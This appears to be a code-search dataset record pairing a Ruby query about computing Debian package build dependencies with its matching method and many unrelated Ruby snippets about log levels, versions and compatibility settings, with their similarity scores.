"def init_compat\n\t\tc = module_info['Compat']\n\n\t\tif (c == nil)\n\t\t\tc = module_info['Compat'] = Hash.new\n\t\tend\n\n\t\t# Initialize the module sub compatibilities\n\t\tc['Payload'] = Hash.new if (c['Payload'] == nil)\n\t\tc['Encoder'] = Hash.new if (c['Encoder'] == nil)\n\t\tc['Nop'] = Hash.new if (c['Nop'] == nil)\n\n\t\t# Update the compat-derived module specific compatibilities from\n\t\t# the specific ones to make a uniform view of compatibilities\n\t\tc['Payload'].update(module_info['PayloadCompat'] || {})\n\t\tc['Encoder'].update(module_info['EncoderCompat'] || {})\n\t\tc['Nop'].update(module_info['NopCompat'] || {})\n\tend",
"def min_android_security_patch_level=(value)\n @min_android_security_patch_level = value\n end",
"def init_compat\n super\n\n #\n # Merge in payload compatible defaults\n #\n p = module_info['Compat']['Payload']\n\n CompatDefaults::Payload.each_pair { |k,v|\n (p[k]) ? p[k] << \" #{v}\" : p[k] = v\n }\n\n #\n # Set the default save registers if none have been explicitly\n # specified.\n #\n if (module_info['SaveRegisters'] == nil)\n module_info['SaveRegisters'] = [ 'esp', 'ebp' ]\n end\n end",
"def level=( level )\n super(level || 0)\n end",
"def level=(new_level)\n super new_level.to_s\n end",
"def enforcement_level=(value)\n @enforcement_level = value\n end",
"def level= level\n if (0..6).include? level then @level = level\n elsif LEVEL.include? level.to_s then @level = LEVEL.index level\n else @level = UNKNOWN\n end\n end",
"def set_debug_level(val)\n super\n end",
"def set_debug_level(val)\n super\n end",
"def default_log_level\n\t\t\tif $DEBUG\n\t\t\t\tLogger::DEBUG\n\t\t\telsif $VERBOSE\n\t\t\t\tLogger::INFO\n\t\t\telse\n\t\t\t\tLogger::WARN\n\t\t\tend\n\t\tend",
"def default_log_level(env = ENV)\n\t\t\tif level = env['CONSOLE_LOG_LEVEL']\n\t\t\t\tLEVELS[level] || Logger.warn\n\t\t\telsif $DEBUG\n\t\t\t\tLogger::DEBUG\n\t\t\telsif $VERBOSE.nil?\n\t\t\t\tLogger::WARN\n\t\t\telse\n\t\t\t\tLogger::INFO\n\t\t\tend\n\t\tend",
"def level\n init unless @initialized\n level = level_to_sym(@level)\n end",
"def strict_mode=(value); end",
"def minor_version_default!\n self.minor_version = 0\n end",
"def default!\n self.severity = :DEFAULT\n end",
"def safe_level(*) end",
"def effective_version_threshold\n version_threshold || course.version_threshold\n end",
"def access_level=(new_level)\n super new_level.to_s\n end",
"def access_level=(new_level)\n super new_level.to_s\n end",
"def default_version; end",
"def safe_level\n safe? ? 4 : 0\n end",
"def min_android_security_patch_level\n return @min_android_security_patch_level\n end",
"def level=(level)\n @level = level\n @implementation.level = @level if @implementation\n level\n end",
"def level_for_env\n case RCApp.env\n when 'test'\n SILENT\n when 'debug'\n DEBUG\n when 'release'\n ERROR\n end\n end",
"def default_level\n ENV.key?(ENV_FLAG) ? ::Logger::DEBUG : ::Logger::WARN\n end",
"def log_level level\n level = Deployable::Logger.const_get level.upcase unless \n level.kind_of? ::Fixnum\n\n @log.level = level\n end",
"def level; end",
"def level; end",
"def level; end",
"def level; end",
"def level; end",
"def level; end",
"def major; end",
"def major; end",
"def major; end",
"def bump_major_version; end",
"def level=(_arg0); end",
"def level=(_arg0); end",
"def level\n @level ||= :warn\n end",
"def default_level\n self.levels[nil]\n end",
"def base_priority\n super || default_priority\n end",
"def level=(new_level)\n @logger.level=Logger::Severity.const_get(new_level.to_sym.upcase)\n end",
"def support_level\n @attributes[:support_level]\n end",
"def major=(_arg0); end",
"def gemfile_ruby_patchlevel\n if definition.ruby_version.respond_to?(:patchlevel)\n definition.ruby_version.patchlevel\n end\n end",
"def set_warn_level!(level = 2)\n warn_levels = ['0','1','2','no']\n return unless warn_levels.include?(level.to_s.downcase)\n\n @options[:warning] = level\n end",
"def level=(level) # needed to meet the Sentry spec\n @level = level.to_s == \"warn\" ? :warning : level\n end",
"def def_version; end",
"def log_level=(_arg0); end",
"def log_level=(_arg0); end",
"def log_level\n @log_level ||= DEFAULT_LOG_LEVEL\n end",
"def log_level\n @log_level ||= DEFAULT_LOG_LEVEL\n end",
"def default_style\n return 0\n end",
"def set_defaults\n self.version = 0\n end",
"def log_level=(level); end",
"def set_log_level(level=nil)\n defined?(Rails) and (default = (Rails.env.production? ? \"INFO\" : \"DEBUG\")) or (default = \"INFO\")\n log_level = (ENV['LOG_LEVEL'] || level || default)\n self.level = ZTK::Logger.const_get(log_level.to_s.upcase)\n end",
"def set_vendor_extension_warning!(level = 'Default')\n @options[:vextwarning] = nil if level.to_s.downcase == 'default'\n @options[:vextwarning] = 'true' if level.to_s.downcase == 'warnings'\n @options[:vextwarning] = 'false' if level.to_s.downcase == 'errors'\n end",
"def log_level; end",
"def log_level; end",
"def severity_level=(value)\n if value == @defaults['severityLevel']\n @values.delete 'severityLevel' if @values.key? 'severityLevel'\n else\n @values['severityLevel'] = value\n end\n end",
"def default_priority\n const_get(:DEFAULT_PRIORITY)\n end",
"def compilation_level\n # Try to map the compilation level to its expanded\n # version first, otherwise just return what was given\n COMPILATION_LEVELS[@compilation_level || :simple] || @compilation_level\n end",
"def compatibility(other)\n compat = 100\n compat -= 4 unless driving_pref + other.driving_pref == 0\n compat -= 5 if gender != other.gender\n compat -= 6 if company != other.company\n compat -= 3*(talkativeness-other.talkativeness).abs\n compat -= 20 if smoke != other.smoke\n compat -= 10 if ac != other.ac\n if radio_stations.length >= other.radio_stations.length\n stations1 = radio_stations\n stations2 = other.radio_stations\n else\n stations1 = other.radio_stations\n stations2 = radio_stations\n end\n stations1.each {|s| compat -= 1 unless stations2.include?(s)}\n return compat\n end",
"def minor; end",
"def minor; end",
"def minor; end",
"def set_arc_compatibility_flag!\n set_hash_value('set_arc_compatibility_flag', true)\n end",
"def dev_minor() end",
"def log_level\n @log_level ||= \"Log4r::#{@options[:log_level].upcase}\".constantize\n end",
"def level=(value)\n @level = ::Logger::Severity.const_get(value.to_s.upcase)\n end",
"def enforcement_level\n return @enforcement_level\n end",
"def logger_level; end",
"def minimum_warning_patch_version=(value)\n @minimum_warning_patch_version = value\n end",
"def set_log_level( level )\n case level\n when :fatal\n ::Logger::FATAL\n when :error\n ::Logger::ERROR\n when :warn\n ::Logger::WARN\n when :info\n ::Logger::INFO\n when :debug\n ::Logger::DEBUG\n else\n ::Logger::INFO\n end\n end",
"def default_priority\n 0\n end",
"def level=(level)\n init unless @initialized\n unless @level_frozen\n new_level = case level\n when Symbol then level_from_sym(level)\n when String then level_from_sym(level.to_sym)\n else level\n end\n if new_level != @level\n @logger.info(\"[setup] setting log level to #{level_to_sym(new_level).to_s.upcase}\")\n @logger.level = @level = new_level\n end\n end\n level = level_to_sym(@level)\n end",
"def bump_patch_version; end",
"def level(l)\n @config[:level] = l\n end",
"def transition_to_dev inc: :patch\n props = { prerelease: ['dev'] }\n \n t.match level,\n 'release', ->(_) {\n succ = public_send( inc ).succ\n \n merge inc => succ, **props\n },\n \n 'rc', ->(_) {\n merge **props\n },\n \n 'dev', ->(_) {\n raise QB::VersionError,\n \"Version #{ self } is already at `dev` level\"\n }\n end",
"def effective_version_penalty \n version_penalty || course.version_penalty\n end",
"def rollbar_level(severity)\n [:debug, :info, :warning, :error, :critical, :error][severity] || :error\n end",
"def set_safe_level\n @@safe_level = $SAFE\n end",
"def level\n @level || :trace\n end",
"def level\n @level || :trace\n end",
"def major_version; end",
"def level\n Logger::Severity.constants.each do |name|\n return name.downcase.to_sym if @logger.level.eql?(Logger::Severity.const_get(name))\n end\n raise \"error\"\n end",
"def log_level(value)\n Logger.log_level = value\n return nil\n end",
"def minimum_warning_patch_version\n return @minimum_warning_patch_version\n end",
"def level=(lvl)\n @level = if lvl.is_a?(Integer)\n lvl\n else\n Level::NAME_TO_LEVEL.fetch(lvl.to_s.upcase)\n end\n end",
"def get_default_log_check_levels\n return [:error, :fatal]\n end",
"def loglevel(level)\n if level < 0 or level > 2\n return nil\n end\n @loglevel = level\n return @loglevel\n end",
"def set_certification_level(level)\n case level\n when :form_filling\n certification_level = PdfSignatureAppearance::CERTIFIED_FORM_FILLING\n when :form_filling_and_annotations\n certification_level = PdfSignatureAppearance::CERTIFIED_FORM_FILLING_AND_ANNOTATIONS\n when :no_changes_allowed\n certification_level = PdfSignatureAppearance::CERTIFIED_NO_CHANGES_ALLOWED\n when :not_certified\n level = PdfSignatureAppearance::NOT_CERTIFIED\n end\n @stamper.getSignatureAppearance.setCertificationLevel(certification_level)\n end",
"def log_level\n @log_level ||= WARN\n end",
"def set_arc_compatibility_flag!\n @set_arc_compatibility_flag = true\n end",
"def level\n @level || Helpers.char_level(@entity)\n end",
"def level=(val)\n unless LEVELS.include?(val)\n fail \"Unknown log level, valid values are: #{LEVELS}\"\n end\n\n # Map the log4r levels to our simplified 3 level system\n # log4r level order is DEBUG < INFO < WARN < ERROR < FATAL\n case val\n when :normal\n # Output everything except debug statements\n console.level = Logger::INFO\n # Output everything\n log_files(:level=, Logger::DEBUG) unless console_only?\n when :verbose\n console.level = Logger::DEBUG\n log_files(:level=, Logger::DEBUG) unless console_only?\n when :silent\n # We don't use any fatal messages, so this is effectively OFF\n console.level = Logger::FATAL\n log_files(:level=, Logger::DEBUG) unless console_only?\n end\n\n @level = val\n end"
] | [
"0.66932446",
"0.6421182",
"0.6386833",
"0.6287057",
"0.61542505",
"0.6137305",
"0.6110456",
"0.5946597",
"0.5921266",
"0.58900195",
"0.5840121",
"0.5821903",
"0.5821903",
"0.58121353",
"0.5804544",
"0.5798878",
"0.5747369",
"0.5746987",
"0.572297",
"0.57138383",
"0.5693415",
"0.5676373",
"0.5676373",
"0.56718373",
"0.56714946",
"0.56597036",
"0.5655084",
"0.5648998",
"0.5635256",
"0.5634947",
"0.5618969",
"0.5618969",
"0.5618969",
"0.5618969",
"0.5618969",
"0.5618969",
"0.5592288",
"0.5592288",
"0.5592288",
"0.5580812",
"0.5565497",
"0.5565497",
"0.5553639",
"0.5530803",
"0.5503491",
"0.54974353",
"0.5480446",
"0.54720867",
"0.54685354",
"0.5448487",
"0.5445048",
"0.5434652",
"0.5432741",
"0.5432741",
"0.54101795",
"0.54101795",
"0.54098845",
"0.5393741",
"0.5379425",
"0.5376443",
"0.53650105",
"0.53637767",
"0.53637767",
"0.53521717",
"0.5339598",
"0.5317103",
"0.53168625",
"0.5314232",
"0.5314232",
"0.5314232",
"0.5300317",
"0.5299572",
"0.5281752",
"0.52768856",
"0.5276694",
"0.52766186",
"0.52665913",
"0.52658504",
"0.5265211",
"0.5247147",
"0.5245832",
"0.5243723",
"0.52348256",
"0.52252746",
"0.5219887",
"0.52162427",
"0.52101636",
"0.52101636",
"0.5203871",
"0.51978934",
"0.5197752",
"0.51962703",
"0.519366",
"0.5192193",
"0.51815355",
"0.51760584",
"0.5163388",
"0.5153402",
"0.5129472",
"0.51277256"
] | 0.7287851 | 0 |
Compute the build dependencies for a packag info object return [Array] list of dependencies | def build_dependencies(pkginfo)
dependencies = []
pkgdeps = pkginfo.dependencies
deps = pkgdeps[:rock_pkginfo].select do |pkginfo|
pkg_name = debian_name(pkginfo, true)
!rock_release_platform.ancestorContains(pkg_name)
end .map { |p| p.name }
gems = pkgdeps[:nonnative].select do |gem,version|
pkg_ruby_name = debian_ruby_name(gem, false)
pkg_prefixed_name = debian_ruby_name(gem, true)
!( rock_release_platform.ancestorContains(gem) ||
rock_release_platform.ancestorContains(pkg_ruby_name) ||
rock_release_platform.ancestorContains(pkg_prefixed_name))
end .map{ |p| p[0] }
deps.concat(gems)
deps
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def compute_revdeps\n result = Hash.new { |h, k| h[k] = Set.new }\n each_autobuild_package do |pkg|\n pkg.dependencies.each do |pkg_name|\n result[pkg_name] << pkg.name\n end\n pkg.optional_dependencies.each do |pkg_name|\n result[pkg_name] << pkg.name\n end\n pkg.os_packages.each do |pkg_name|\n result[pkg_name] << pkg.name\n end\n end\n result\n end",
"def find_dependencies(env)\n args = [] if (env = env.dup).sub!(REGEXP_DEVPKG,'') # are we in compile mode?\n return [[], [], args] if args && env.empty?\n\n require 'rubygems/remote_fetcher'\n @@deps = YAML.load(fetch(env))['gems'] unless defined?(@@deps)\n @@deps.key?(spec.name) or return(args ? [[], [], args] : nil)\n\n # find dependencies\n case deps = @@deps[spec.name]\n when nil, \"*\" # for nil or '*', use the default extension name\n deps = [\"*\"]\n when String # string of space-delimited packages and extensions\n when Array # array of packages and extensions\n when Hash # hash of packages and extensions, indexed by version requirements\n reqs, deps = deps.find do |reqs, info| # deps is an array or space-delimited string\n Gem::Requirement.new(reqs.split(',')).satisfied_by?(spec.version)\n end\n reqs or return # can't find the right version\n deps ||= [\"*\"] # deps are nil, use the default extension name\n end\n deps = deps.strip.split(/\\s+/) if deps.is_a?(String)\n deps = deps.compact.uniq\n\n # helpful variables\n bcwd = Dir.pwd\n benv = File.dirname(env.split(/[?;#]/,2).first)\n name = \"#{spec.full_name}.tar.gz\"\n\n # grok dependencies\n pkgs, exts = [], []\n deps.each do |item|\n if item.include?(\"*\") || item =~ REGEXP_SCHEMA || item.include?(\".tar.gz\")\n exts << item unless args\n elsif item =~ REGEXP_DEVPKG\n pkgs << $' if args\n elsif item =~ REGEXP_DEVARG\n args << $' if args\n else\n pkgs << item unless args\n end\n end\n exts.map! do |item|\n case item\n when \"*\" then item = File.join(benv, name) # use complete default tarball name\n when /\\A\\*/ then item[0,1] = benv # path relative to env variable\n when /\\A[^\\/]/ then item[0,0] = bcwd + \"/\" # path relative to current directory\n end\n item.gsub(\"*\", name) # swap inline wildcards with default tarball name\n end\n [pkgs, exts, args]\n end",
"def go_list_deps\n args = [\"-deps\"]\n args << \"-mod=vendor\" if config.dig(\"go\", \"mod\") == \"vendor\"\n\n # the CLI command returns packages in a pretty-printed JSON format but\n # not separated by commas. this gsub adds commas after all non-indented\n # \"}\" that close root level objects.\n # (?!\\z) uses negative lookahead to not match the final \"}\"\n deps = package_info_command(*args).gsub(/^}(?!\\z)$/m, \"},\")\n JSON.parse(\"[#{deps}]\")\n end",
"def dependencies(pkg)\n pkg.resolve_optional_dependencies\n deps_rock_packages = pkg.dependencies.map do |pkg_name|\n debian_name(Autoproj.manifest.package(pkg_name).autobuild)\n end.sort\n\n pkg_osdeps = Autoproj.osdeps.resolve_os_dependencies(pkg.os_packages)\n # There are limitations regarding handling packages with native dependencies\n #\n # Currently gems need to converted into debs using gem2deb\n # These deps dependencies are updated here before uploading a package\n # \n # Generation of the debian packages from the gems can be done in postprocessing step\n # i.e. see convert_gems\n \n deps_osdeps_packages = []\n native_package_manager = Autoproj.osdeps.os_package_handler\n _, native_pkg_list = pkg_osdeps.find { |handler, _| handler == native_package_manager }\n\n deps_osdeps_packages += native_pkg_list if native_pkg_list\n\n # Update global list\n @osdeps += deps_osdeps_packages\n\n non_native_handlers = pkg_osdeps.collect do |handler, pkg_list|\n if handler != native_package_manager\n [handler, pkg_list]\n end\n end.compact\n\n non_native_handlers.each do |pkg_handler, pkg_list|\n # Convert native ruby gems package names to rock-xxx \n if pkg_handler.kind_of?(Autoproj::PackageManagers::GemManager)\n pkg_list.each do |name,version|\n @ruby_gems << [name,version]\n deps_osdeps_packages << debian_ruby_name(name)\n end\n else\n raise ArgumentError, \"cannot package #{pkg.name} as it has non-native dependencies (#{pkg_list}) -- #{pkg_handler.class} #{pkg_handler}\"\n end\n end\n\n # Remove duplicates\n @osdeps.uniq!\n @ruby_gems.uniq!\n\n # Return rock packages and osdeps\n [deps_rock_packages, deps_osdeps_packages]\n end",
"def build_components_object\n info = @scan_report.to_h.fetch(:info)\n return [] unless info[:dependencies]\n\n components = []\n\n info[:dependencies].each do |dependency|\n components << parse_dependency(dependency)\n end\n components\n end",
"def recursive_dependencies(pkginfo)\n\n all_required_pkginfos = pkginfo.required_rock_packages\n\n all_recursive_deps = {:rock => [], :osdeps => [], :nonnative => [], :extra_gems => []}\n all_required_pkginfos.each do |pkginfo|\n pdep = filtered_dependencies(pkginfo)\n pdep.keys.each do |k|\n all_recursive_deps[k].concat pdep[k]\n end\n end\n all_recursive_deps.each_value { |a| a.uniq! }\n\n if !all_recursive_deps[:nonnative].empty?\n all_recursive_deps[:nonnative] = GemDependencies::resolve_all(all_recursive_deps[:nonnative]).keys\n end\n recursive_deps = all_recursive_deps.values.flatten.uniq\n end",
"def dependencies\n return @dependencies unless @dependencies.nil?\n @dependencies = [ ]\n lockfile.each_line do |line|\n if line =~ /^\\s{4}([-\\w_.0-9]+)\\s*\\((.*)\\)/\n @dependencies << [$1, $2]\n end\n end\n @dependencies\n end",
"def dependencies(name)\n dependencies = []\n submodule = submodule(name)\n if submodule.has_key?(:dependencies)\n submodule[:dependencies].each do |dependency|\n dependencies << dependency\n dependencies << dependencies(dependency)\n end\n end\n\n dependencies.flatten.uniq.sort\n end",
"def dependencies( *args )\n names = args # note: for now assume all args are just names\n # e.g. 'pluto-models', 'pluto-update', etc.\n deps = @versions.select do |rec| names.include?( rec[0] ) end\n .map do |rec| [rec[0], rec[1]] end\n\n ## todo/fix: throw exception if dependency is missing!\n ## names.size == deps.size\n puts \"names.size == deps.size #{names.size} == #{deps.size}\"\n deps\n end",
"def dependencies\n []\n end",
"def dependent_gems(check_dev=true)\n out = []\n Gem::Specification.each do |spec|\n deps = check_dev ? spec.dependencies : spec.runtime_dependencies\n deps.each do |dep|\n if self.satisfies_requirement?(dep)\n sats = []\n find_all_satisfiers(dep) do |sat|\n sats << sat\n end\n out << [spec, dep, sats]\n end\n end\n end\n out\n end",
"def dependencies\n []\n end",
"def parse_deps(input)\n matches = input.scan(/\\s+-\\s+\\[ \\]\\s+(\\S+)\\s+(\\S+\\s+[0-9.]+)/) || []\n\n gemspecs = matches.map do |match|\n {:name => match[0], :version => match[1]}\n end\n\n # NOTE: These gemspecs are gems that are not yet loaded. We don't know if\n # they are installed or not, so we don't know for sure if the\n # dependency will be met at runtime. So, we'll execute a gem command\n # to check to see if these are installed and ignore the ones that\n # already are.\n gemspecs.delete_if do |gemspec|\n cmd = \"gem list #{gemspec[:name]} -i -l\"\n if gemspec[:version]\n cmd << \" -v '#{gemspec[:version]}'\"\n end\n `#{cmd}` =~ /true/\n end\n\n return gemspecs\n end",
"def dependencies\n members.each_with_object([]) do |attr_name, depends|\n value = send(attr_name)\n value = pipeline.objects.fetch(value) if value.is_a?(Symbol)\n depends << value.dependencies << value if value.is_a?(PipelineObject)\n end.flatten\n end",
"def get_dependencies(lib_path)\n\tdeps = []\n\tentry_name_regex = /(.*)\\(compatibility version.*\\)/\n\t`otool -L '#{lib_path}'`.strip.split(\"\\n\").each do |entry|\n\t\tmatch = entry_name_regex.match(entry)\n\t\tif (match)\n\t\t\tdep_path = match[1].strip\n\n\t\t\t# Note - otool lists dependencies separately for each architecture\n\t\t\t# in a universal binary - only return the unique paths\n\t\t\tdeps << dep_path if !deps.include?(dep_path)\n\t\tend\n\tend\n\treturn deps\nend",
"def get_dependencies(lib_path)\n\tdeps = []\n\tentry_name_regex = /(.*)\\(compatibility version.*\\)/\n\t`otool -L '#{lib_path}'`.strip.split(\"\\n\").each do |entry|\n\t\tmatch = entry_name_regex.match(entry)\n\t\tif (match)\n\t\t\tdep_path = match[1].strip\n\n\t\t\t# Note - otool lists dependencies separately for each architecture\n\t\t\t# in a universal binary - only return the unique paths\n\t\t\tdeps << dep_path if !deps.include?(dep_path)\n\t\tend\n\tend\n\treturn deps\nend",
"def depends_upon(match_name) #, constraint)\n list = []\n $LEDGER.each do |name, libs|\n case libs\n when Library\n list << libs if libs.requirements.any?{ |r| match_name == r['name'] } \n else\n libs.each do |lib|\n list << lib if lib.requirements.any?{ |r| match_name == r['name'] } \n end\n end\n end\n list\n end",
"def dependencies\n []\n end",
"def dependencies\n version_req = if options[:version]\n ::Gem::Requirement.create(options[:version])\n else\n ::Gem::Requirement.default\n end\n if gem_dir\n ::Gem.clear_paths; ::Gem.path.unshift(gem_dir)\n ::Gem.source_index.refresh!\n end\n deps = []\n ::Gem.source_index.each do |fullname, gemspec| \n if version_req.satisfied_by?(gemspec.version)\n deps << ::Gem::Dependency.new(gemspec.name, \"= #{gemspec.version}\")\n end\n end\n ::Gem.clear_paths if gem_dir\n deps.sort\n end",
"def dependencies\n @dependencies.values\n end",
"def dependency_list\n @target.dependencies.map(&:display_name)\n end",
"def dependencies\n @dependencies ||= []\n end",
"def dependencies\n @dependencies ||= []\n end",
"def dependencies\n @dependencies ||= []\n end",
"def dependencies\n @dependencies ||= []\n end",
"def get_dep_names(data)\n return unless data.key?(\"dependencies\")\n\n data['dependencies'].each do |name, dep_info|\n @deps[name] = {}\n get_dep_names(dep_info) if dep_info['dependencies']\n end\n end",
"def getDependencies service\r\n deps = []\r\n Util.csprojs(service).each do |csproj|\r\n deps += getDeps(csproj) \r\n end\r\n return deps.uniq\r\nend",
"def gem_build_requirements\n @metadata[:build_requires].nil? ? [] :\n @metadata[:build_requires].select { |r| r.gem? }\n end",
"def depend_upon(match_name) #, constraint)\n list = []\n each do |name, libs|\n case libs\n when Library\n list << libs if libs.requirements.any?{ |r| match_name == r['name'] } \n else\n libs.each do |lib|\n list << lib if lib.requirements.any?{ |r| match_name == r['name'] } \n end\n end\n end\n list\n end",
"def build_local_dependency_list(force=true)\n install_root = self.internal_package_root\n\n unless File.exists?(install_root)\n return nil unless force\n rebuild_dependency_list\n end\n\n Dir[File.join(install_root, '*')].map do |package_name|\n pkg = BPM::Package.new package_name\n pkg.load_json\n pkg\n end\n end",
"def check_dependencies\n fetch_module_dependencies.map do |dependency, constraint|\n dependency = dependency.sub('-', '/')\n current = dependency == @updated_module ? SemanticPuppet::Version.parse(@updated_module_version) : @forge.get_current_version(dependency)\n [dependency, constraint, current, constraint.include?(current)]\n end\n end",
"def depends_on()\n if @value.nil?\n return []\n end\n unless @depends_on\n @depends_on = @value.variables.collect do |var|\n\ttmp = @parent.variable_by_name(var)\n\ttmp or raise \"Can't locate variable dependency '#{var}'!\"\n end\n end\n @depends_on\n end",
"def go_pkg_deps(pkgs, root_path)\n deps = []\n pkgs.each do |pkg|\n deps << pkg\n `go list -f '{{ join .Deps \"\\\\n\"}}' #{pkg}`.split(\"\\n\").select do |path|\n if path.start_with? root_path\n deps << path\n end\n end\n end\n return deps.sort.uniq\nend",
"def go_pkg_deps(pkgs, root_path)\n deps = []\n pkgs.each do |pkg|\n deps << pkg\n `go list -f '{{ join .Deps \"\\\\n\"}}' #{pkg}`.split(\"\\n\").select do |path|\n if path.start_with? root_path\n deps << path\n end\n end\n end\n return deps.sort.uniq\nend",
"def dependencies\n @dependencies ||= []\n end",
"def dependencies\n node.output[carrier].keys\n end",
"def walk_down_dependencies(pkg_name, known_deps=Array.new)\n\talldeps = Array.new\n\t@total_deps[pkg_name].each { |m|\n\t\tunless alldeps.include?(m) || m.nil? || known_deps.include?(m) \n\t\t\talldeps = alldeps + walk_down_dependencies(m, alldeps)\n\t\tend\n\t\talldeps.push m\n\t}\n\talldeps.uniq!\n\talldeps.push pkg_name\n\t# puts alldeps.join(\", \") \n\treturn alldeps.compact \nend",
"def dependency_versions(args = {}, &bl)\n versions = {}\n args = {:recursive => true, :dev_deps => true, :versions => versions}.merge(args)\n deps.each do |dep|\n gem = Polisher::Gem.retrieve(dep.name)\n versions.merge!(gem.versions(args, &bl))\n end\n versions\n end",
"def dependencies_for(specification)\n []\n end",
"def dependencies(recurse: true)\n return @dependencies if @dependencies\n if depends.nil? || depends.empty?\n @dependencies = nil\n else\n @dependencies = depends.map do |name, dependency|\n loader = StackFileLoader.for(dependency['stack'], self)\n deps = { 'name' => name, 'stack' => loader.source, 'variables' => dependency.fetch('variables', Hash.new) }\n if recurse\n child_deps = loader.dependencies\n deps['depends'] = child_deps unless child_deps.nil?\n end\n deps\n end\n end\n end",
"def dependencies(include_parent = false)\n []\n end",
"def dependencies(include_parent = false)\n []\n end",
"def dependencies(include_parent = false)\n []\n end",
"def remote_dependencies(gem_name, _version)\n conn = Faraday.new(url: 'https://rubygems.org') do |h|\n h.headers[:content_type] = 'application/x-www-form-urlencoded'\n h.request :url_encoded\n h.adapter :excon\n end\n response = conn.get(\"/api/v1/gems/#{gem_name}.json\")\n dep_list = MultiJson.load(response.body)\n dep_list['dependencies'].values.flatten.map do |j|\n Gem::Dependency.new(\n j['name'],\n Gem::Requirement.new(j['requirements'].split(','))\n )\n end\n end",
"def dependency_tree(args = {}, &bl)\n dependencies = {}\n args = {:recursive => true,\n :dev_deps => true,\n :matching => :latest,\n :dependencies => dependencies}.merge(args)\n\n process = []\n deps.each do |dep|\n resolved = nil\n begin\n resolved = Polisher::Gem.matching(dep, args[:matching])\n rescue\n end\n yield self, dep, resolved\n process << resolved unless resolved.nil?\n end\n\n process.each { |dep|\n dependencies.merge!(dep.dependency_tree(args, &bl))\n }\n\n dependencies\n end",
"def deps(sequence)\n return [] unless checker.valid? # Exit early if it's bad data\n all = [] # Start collecting the list.\n CeleryScript::TreeClimber.travel(tree, ->(n) {\n # Iterate over each node, looking for \"args of interest\".\n # Tools, sub sequences, etc.\n ARGS_OF_INTEREST.map do |arg, klass|\n id = n&.args&.fetch(arg, nil)&.value\n all.push(klass.find(id)) if id\n end\n })\n\n # Filter out the target sequence to prevent runaway recursion.\n # It would be impossible to delete recursive sequences otherwise.\n all.select! { |d| !(d.is_a?(Sequence) && (d.id == sequence.id)) }\n\n # Finally, output the data in a format that can directly be used by\n # SequenceDependency#create!().\n return all.uniq.map do |d|\n { sequence: sequence, dependency_type: d.class, dependency_id: d.id }\n end\n end",
"def runtime_dependencies\n dependencies.select(&:runtime?)\n end",
"def getdeps(pkg)\n deps = []\n @pkg.each {|k, v| deps << k if v.include?(pkg) }\n\n return deps\n end",
"def core_fetch_dependencies(deps, verbose)\n deps.each do |pkg_name, pkg_version|\n core_fetch_dependency pkg_name, pkg_version, :runtime, verbose\n end\n end",
"def bundler_dependencies_for(bundler_runtime, *groups); end",
"def component_deps(cmp)\n component(cmp).fetch('deps', [])\nend",
"def component_deps(cmp)\n component(cmp).fetch('deps', [])\nend",
"def generate_dependencies_data(podfile)\n podfile.dependencies.map(&:to_s).sort\n end",
"def dependency_versions(args = {}, &bl)\n versions = args[:versions] || {}\n check_deps = args[:dev] ? dev_deps : deps\n\n check_deps.each do |dep|\n unless versions.key?(dep.name)\n begin\n gem = Polisher::Gem.retrieve(dep.name)\n versions.merge! gem.versions(args, &bl)\n rescue\n unknown = Polisher::VersionChecker.unknown_version(:all, dep.name, &bl)\n versions.merge! dep.name => unknown\n end\n end\n\n args[:versions] = versions\n end\n\n versions\n end",
"def run_package_for_specified(bundle_info)\n if $options[:buildAll]\n info 'Packaging all dependencies'\n\n $toPackageDeps = []\n\n all_dependencies.each do |dep|\n files = dep.getInstalledFiles\n\n $toPackageDeps.push dep.Name if files && !files.empty?\n end\n\n puts $toPackageDeps.to_s\n end\n\n package_dependencies $toPackageDeps, bundle_info\nend",
"def filtered_dependencies(pkginfo, with_rock_release_prefix = true)\n target_platform = @packager.target_platform\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, target_platform.architecture)\n\n deps_rock_pkginfos = pkginfo.dependencies[:rock_pkginfo].dup\n deps_osdeps_packages = pkginfo.dependencies[:osdeps].dup\n non_native_dependencies = pkginfo.dependencies[:nonnative].dup\n\n if target_platform.distribution_release_name\n # CASTXML vs. GCCXML in typelib\n if pkginfo.name =~ /typelib$/\n # add/remove the optional dependencies on the\n # rock-package depending on the target platform\n # there are typelib versions with and without the\n # optional depends. we know which platform requires\n # a particular dependency.\n deps_rock_pkginfos.delete_if do |pkginfo|\n pkginfo.name == \"castxml\" || pkginfo.name == \"gccxml\"\n end\n\n if target_platform.contains(\"castxml\")\n deps_osdeps_packages.push(\"castxml\")\n elsif target_platform.contains(\"gccxml\")\n #todo: these need to checked on the other platforms\n deps_osdeps_packages.push(\"gccxml\")\n else\n raise ArgumentError, \"TargetPlatform: #{target_platform} does neither support castxml nor gccml - cannot build typelib\"\n end\n end\n\n # Filter out optional packages, e.g. llvm and clang for all platforms where not explicitly available\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n result = true\n Packaging::Config.packages_optional.each do |pkg_name|\n regex = Regexp.new(pkg_name)\n if regex.match(name)\n result = target_platform.contains(name)\n end\n end\n result\n end\n\n # Filter out excluded packages, e.g. libqwt5-qt4-dev\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n result = true\n Packaging::Config.packages_excluded.each do |pkg_name|\n regex = Regexp.new(pkg_name)\n if regex.match(name)\n Packager.info \"#{pkginfo.name} excluding osdeps #{pkg_name} as dependency\"\n result = false\n end\n end\n result\n end\n\n # Filter ruby versions out -- we assume chroot has installed all\n # ruby versions\n #\n # This is a workaround, since the information about required packages\n # comes from the build server platform and might not correspond\n # with the target platform\n #\n # Right approach: bootstrap within chroot and generate source packages\n # in the chroot\n #deps_osdeps_packages = deps[:osdeps].select do |name|\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n name !~ /^ruby[0-9][0-9.]*/\n end\n\n # Prefer package of the OS for gems if they are available there\n #deps_nonnative_packages = deps[:nonnative].map do |name, version|\n non_native_dependencies = non_native_dependencies.map do |name, version|\n dep_name,is_osdep = native_dependency_name(name)\n # if with_rock_release_prefix is given all packages 'have to be'\n # os dependencies, otherwise it triggers further resolution of nonnative packages\n # which cannot exist (in resolve_all)\n if is_osdep || with_rock_release_prefix\n deps_osdeps_packages << dep_name\n nil\n else\n name\n end\n end.compact\n end\n\n deps_rock_packages = deps_rock_pkginfos.map do |pkginfo|\n debian_name = @packager.debian_name(pkginfo, with_rock_release_prefix)\n this_rock_release.packageReleaseName(debian_name)\n end.sort\n\n Packager.info 